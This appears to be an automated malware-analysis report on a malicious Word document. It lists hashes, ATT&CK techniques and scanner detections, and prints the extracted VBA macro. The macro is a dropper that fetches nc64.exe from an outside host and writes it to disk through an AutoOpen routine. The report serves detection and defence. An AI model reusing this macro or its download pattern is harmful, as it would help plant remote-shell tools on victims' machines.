Office (OOXML) malware analysis — malicious · 8100e82bff89b61c

MALICIOUS

Office (OOXML)

27.7 KB Created: 2021-06-26 06:42:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-06-30

MD5: da434683d55f90b4ca263653072148a7 SHA-1: af30e95c09b09b3484a64caa66847907d7f32b82 SHA-256: 8100e82bff89b61cbf1fc9faa602b932ea4551ac4a05bbb514ae3bb49f153cdc

358 Risk Score

Malware Insights

MITRE ATT&CK

T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1105 Ingress Tool Transfer

The sample is a malicious OOXML document containing VBA macros. The AutoOpen macro executes a VBA script that uses URLDownloadToFile to download a payload from 'http://kali.hackerman.hack/nc64.exe' and saves it as 'C:\nc64.exe.xlsx'. This indicates a downloader or dropper functionality, likely intended to fetch and execute further malicious content.

Heuristics 9

ClamAV: Doc.Dropper.Agent-6412232-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6412232-1
VBA project inside OOXML medium 5 related findings OOXML_VBA

Document contains a VBA project — VBA macros present

URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD

URLDownloadToFile in VBA

Matched line in script

Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long

VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC

VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
Matched line in script
```
    oStream.Write WinHttpReq.responseBody
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Fake invoice / payment lure low SE_INVOICE_LURE

Document contains invoice or payment language paired with an action verb — useful context when combined with link, macro, or attachment indicators
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL https://www.ato.gov.au/Business/GST/Issuing-tax-invoices/ Referenced by macro
- http://kali.hackerman.hack/nc64.exeReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasReferenced by macro
- http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
- http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	1227 bytes
SHA-256: `a2edfc945c8a6b24f0512d8ad37e3463464c3d6b4b83db4a3defc6af803c0fbc`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "NewMacros" Option Explicit Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Sub DownloadFile() Dim WinHttpReq As Object Dim oStream As Object Dim myURL As String Dim LocalFilePath As String myURL = "http://kali.hackerman.hack/nc64.exe" LocalFilePath = "C:\nc64.exe.xlsx" Set WinHttpReq = CreateObject("Microsoft.XMLHTTP") WinHttpReq.Open "GET", myURL, False, "", "" '("username", "password") WinHttpReq.send If WinHttpReq.Status = 200 Then Set oStream = CreateObject("ADODB.Stream") oStream.Open oStream.Type = 1 oStream.Write WinHttpReq.responseBody oStream.SaveToFile LocalFilePath, 2 ' 1 = no overwrite, 2 = overwrite oStream.Close End If End Sub Sub AutoOpen() Dim DownloadFile() End Sub
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	11776 bytes
SHA-256: `b906bbea12783cccfc52f8765c99ac8a6c6e51867560164d3b076d482ae1e9f2`
Detection ClamAV: Doc.Dropper.Agent-6412232-1 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.